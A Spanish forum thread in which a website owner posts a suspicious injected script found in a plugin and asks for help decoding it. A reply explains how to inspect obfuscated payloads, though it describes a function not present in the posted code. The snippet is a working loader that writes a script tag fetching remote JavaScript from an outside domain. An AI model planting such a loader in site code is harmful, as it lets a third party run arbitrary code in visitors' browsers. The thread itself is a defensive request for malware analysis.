Hola a todos, vengo a que me echeis una mano si es posible.

He encontrado este .js en el codigo de un plugin que he instalado en mi web, tiene muy mala pinta pero no logro desencriptarlo, me gustaria realmente saber el codigo real y ver que es ya que no tengo ni idea.

Gracias y un saludo.

Código:
<script>
document.write("<script src='https:\/\/www.makelele.org\/script\/stats.js?'"+window.btoa(parseInt(Date.now()))+"><\/script>");
</script>
Si ves el código claramente se ve que hace una llamada a la función "deObfusMegaLoad" (Que por cierto no se encuentra en el documento, debe de haber sido declarada previamente.) y le pasa una cadena, la cual seguramente sera el código codificado en Base64 o algo parecido, que luego sera decodificada y evaluada.

Si quieres ver el código busca la función "deObfusMegaLoad" y cambia la parte que llame a la ejecución/inyección/evaluación del código (Como "eval".) por alguna función que imprima en pantalla ("console.log").

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Responder

Volver a “Dudas y Preguntas”